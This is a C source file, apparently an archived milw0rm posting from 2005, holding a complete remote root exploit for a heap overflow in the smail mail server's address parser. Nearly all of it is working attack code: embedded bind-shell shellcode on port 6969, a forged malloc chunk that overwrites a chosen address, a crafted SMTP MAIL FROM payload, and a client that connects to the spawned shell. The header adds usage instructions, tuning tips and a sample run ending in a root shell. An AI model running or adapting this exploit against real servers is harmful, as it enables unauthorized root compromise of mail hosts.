home *** CD-ROM | disk | FTP | other *** search
- /*
- *
- * 0
- *
- * smail preparse_address_1() heap bof remote root exploit
- *
- * infamous42md AT hotpop DOT com
- *
- * Shouts:
- *
- * BMF, wipe with the left, eat with the right
- *
- * Notes:
- *
- * You can't have any characters in overflow buffer that isspace() returns true
- * for. The shellcode is clear of them, but if your return address or retloc
- * has one you gotta figure out another one. My slack box has that situation,
- * heap is at 0x080d.. My gentoo laptop had no such problem and all was fine. I
- * don't have anymore time to BS around with this and make perfect for any and
- * all, b/c I've got exam to study for and Law and Order:CI is on in an hour.
- * If the heap you're targetting is the same way, then try filling it up using
- * some other commands. If the GOT you're targetting is at such address than
- * overwrite a return address on the stack. Surely there's a way, check out the
- * source and be creative; I'm sure there are some memory leaks somewhere you
- * can use to fill up heap as well.
- *
- * You might run into some ugliness trying to automate this for a couple
- * reasons. xmalloc() stores a cookie in front of buffer, and xfree() checks
- * for this cookie before calling free(). So you're going to need that aligned
- * properly unless you can cook up a way to exploit it when it bails out in
- * xfree() b/c of bad cookie and calls write_log() (this func calls malloc() so
- * maybe you can be clever and do something there). Furthermore I found that
- * when trying to trigger this multiple times the alignment was different each
- * time. There are "definitely" more reliable ways to exploit this if you take
- * a deeper look into code which I don't have time to do right now. The padding
- * parameter controls the alignment and the size of the chunk being allocated.
- * You'll probably have to play with it. Yes that's fugly.
- *
- * [n00b@crapbox.outernet] ./a.out
- * Usage: ./a.out < host > < padding > < retloc > < retaddr >
- *
- * [n00b@crapbox.outernet] ./a.out localhost 64 0xbffff39c 0x8111ea0
- * --{ Smack 1.oohaah
- *
- * --{ definitely, adv.:
- * --{ 1. Having distinct limits
- * --{ 2. Indisputable; certain
- * --{ 3. Clearly defined; explicitly precise
- *
- * --{ Said HELO
- *
- * --{ Sent MAIL FROM overflow
- *
- * --{ Going for shell in 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1
- *
- * --{ Attempting to redefine the meaning of 'definitely'
- *
- * --{ Got a shell
- *
- * --{ Updating Webster's
- * --{ definitely, adv.:
- * --{ 1. See specious
- *
- * --{ For the linguistically challenged...
- * --{ specious, adj. :
- * --{ 1. Having the ring of truth or plausibility but actually fallacious
- * --{ 2. Deceptively attractive
- *
- * id
- * uid=0(root) gid=0(root)
- * echo PWNED
- * PWNED
- *
- * - Connection closed by user
- *
- */
-
- #include <stdio.h>
- #include <ctype.h>
- #include <sys/types.h>
- #include <string.h>
- #include <stdint.h>
- #include <unistd.h>
- #include <sys/socket.h>
- #include <netdb.h>
- #include <stdlib.h>
- #include <fcntl.h>
- #include <sys/select.h>
- #include <arpa/inet.h>
-
-
- /* */
- #define BS 0x1000
- #define SMTP_PORT 25
-
-
- #define Z(x, len) memset((x), 0, (len))
- #define die(x) do{ perror((x)); exit(EXIT_FAILURE); }while(0)
- #define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args); exit(EXIT_FAILURE); }while(0)
-
-
- /* fat bloated call them shell code */
- #define SHELL_LEN (sizeof(sc)-1)
- #define SHELL_PORT 6969
- #define NOP 0x90
- char sc[] =
- "\xeb\x0e""notexploitable"
- "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x39\xc6\x04\x24\x02\x89\xe6\xb0\x02"
- "\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50\x6a\x01\x6a\x02"
- "\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a\x10\x56\x50\x89\xe1\xb0"
- "\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x04\xcd"
- "\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89"
- "\xeb\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f"
- "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x6b\x2c\x60\xcd"
- "\x80";
-
-
- /* a dlmalloc chunk descriptor */
- #define CHUNKSZ 0xfffffff8
- #define CHUNKLEN sizeof(mchunk_t)
- typedef struct _mchunk {
- size_t dummy;
- size_t prevsz;
- size_t sz;
- long fd;
- long bk;
- } mchunk_t;
-
- /* */
- ssize_t Send(int s, const void *buf, size_t len, int flags)
- {
- ssize_t n;
-
- n = send(s, buf, len, flags);
- if(n < 0)
- die("send");
-
- return n;
- }
-
- /* */
- ssize_t Recv(int s, void *buf, size_t len, int flags)
- {
- ssize_t n;
-
- n = recv(s, buf, len, flags);
- if(n < 0)
- die("recv");
-
- return n;
- }
-
- /* */
- int conn(char *host, u_short port)
- {
- int sock = 0;
- struct hostent *hp;
- struct sockaddr_in sa;
-
- memset(&sa, 0, sizeof(sa));
-
- hp = gethostbyname(host);
- if (hp == NULL) {
- bye("gethostbyname failed with error %s", hstrerror(h_errno));
- }
- sa.sin_family = AF_INET;
- sa.sin_port = htons(port);
- sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
-
- sock = socket(AF_INET, SOCK_STREAM, 0);
- if (sock < 0)
- die("socket");
-
- if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
- die("connect");
-
- return sock;
- }
-
- /* */
- void shell(char *host, u_short port)
- {
- int sock = 0, l = 0;
- char buf[BS];
- fd_set rfds;
-
- sock = conn(host, port);
-
- printf("--{ Got a shell\n\n"
- "--{ Updating Webster's\n"
- "--{ definitely, adv.:\n"
- "--{ 1. See specious\n\n"
- "--{ For the linguistically challenged...\n"
- "--{ specious, adj. :\n"
- "--{ 1. Having the ring of truth or plausibility but "
- "actually fallacious\n"
- "--{ 2. Deceptively attractive\n\n"
- );
-
- FD_ZERO(&rfds);
-
- while (1) {
- FD_SET(STDIN_FILENO, &rfds);
- FD_SET(sock, &rfds);
-
- if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
- die("select");
-
- if (FD_ISSET(STDIN_FILENO, &rfds)) {
- l = read(0, buf, BS);
- if(l < 0)
- die("read");
- else if(l == 0)
- bye("\n - Connection closed by user\n");
-
- if (write(sock, buf, l) < 1)
- die("write");
- }
-
- if (FD_ISSET(sock, &rfds)) {
- l = read(sock, buf, sizeof(buf));
-
- if (l == 0)
- bye("\n - Connection terminated.\n");
- else if (l < 0)
- die("\n - Read failure\n");
-
- if (write(STDOUT_FILENO, buf, l) < 1)
- die("write");
- }
- }
- }
-
- /* */
- int parse_args(int argc, char **argv, char **host, int *npad,
- u_int *retloc, u_int *retaddr)
- {
- if(argc < 5)
- return 1;
-
- *host = argv[1];
-
- if(sscanf(argv[2], "%d", npad) != 1)
- return 1;
-
- if(sscanf(argv[3], "%x", retloc) != 1)
- return 1;
-
- if(sscanf(argv[4], "%x", retaddr) != 1)
- return 1;
-
- return 0;
- }
-
- /* */
- void sploit(int sock, int npad, u_int retloc, u_int retaddr)
- {
- ssize_t n = 0;
- u_char buf[BS], pad[BS], evil[BS];
- mchunk_t chunk;
-
- Z(buf, BS), Z(pad, BS), Z(evil, BS), Z(&chunk, CHUNKLEN);
-
- /* read greeting */
- n = Recv(sock, buf, BS, 0);
- if(n == 0)
- bye("Server didn't even say hi");
-
- /* send HELO */
- n = snprintf(buf, BS, "HELO localhost\r\n");
- Send(sock, buf, n, 0);
- Z(buf, BS);
- n = Recv(sock, buf, BS, 0);
- if(n == 0)
- bye("Server didn't respond to HELO");
-
- printf("--{ Said HELO\n\n");
-
- /*
- * Build evil chunk overflow. The need to align chunk exactly makes this
- * not so robust. In my short testing I wasn't able to get free() called
- * directly on an area of memory we control. I'm sure you can though if you
- * take some time to study process heap behavior. Note though that you'll
- * have to fill in the magic cookie field that xmalloc()/xfree() and some
- * other functions use, so you'll still need to have it aligned properly
- * which defeats the whole purpose. This exploits the free() call on the
- * buffer we overflow, so you have to align the next chunk accordingly.
- * Anyhow on newest glibc there is a check for negative size field on the
- * chunk being freed, and program dies if it is negative (the exact
- * condition is not negative, but it has that effect pretty much, but go
- * look yourself ;)), So the techniques outlined by gera in phrack don't
- * work (being able to point all chunks at our two evil chunks). Check out
- * most recent glibc code in _int_free() if you haven't already.
- */
- memset(pad, 'A', npad);
-
- chunk.dummy = CHUNKSZ;
- chunk.prevsz = CHUNKSZ;
- chunk.sz = CHUNKSZ;
- chunk.fd = retloc - 12;
- chunk.bk = retaddr;
- memcpy(evil, &chunk, CHUNKLEN);
- evil[CHUNKLEN] = 0;
-
- /* send the overflow */
- n = snprintf(buf, BS, "MAIL FROM:<A!@A:%s> %s%s\n", pad, evil, sc);
- Send(sock, buf, n, 0);
- Z(buf, BS);
-
- printf("--{ Sent MAIL FROM overflow\n\n");
-
- #define SLEEP_TIME 15
- setbuf(stdout, NULL);
- printf("--{ Going for shell in ");
- for(n = 0; n < SLEEP_TIME; n++){
- printf("%d ", SLEEP_TIME-n);
- sleep(1);
- }
- puts("\n");
- }
-
-
- /*
- */
- int main(int argc, char **argv)
- {
- int sock = 0, npad = 0;
- u_int retloc = 0, retaddr = 0;
- char *host = NULL;
-
- if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
- bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);
-
- printf("--{ Smack 1.oohaah\n\n");
-
- sock = conn(host, SMTP_PORT);
-
- printf("--{ definitely, adv.:\n"
- "--{ 1. Having distinct limits\n"
- "--{ 2. Indisputable; certain\n"
- "--{ 3. Clearly defined; explicitly precise\n\n"
- );
-
- sploit(sock, npad, retloc, retaddr);
-
- printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");
-
- shell(host, SHELL_PORT);
-
- return EXIT_SUCCESS;
- }
-
- // milw0rm.com [2005-03-28]
-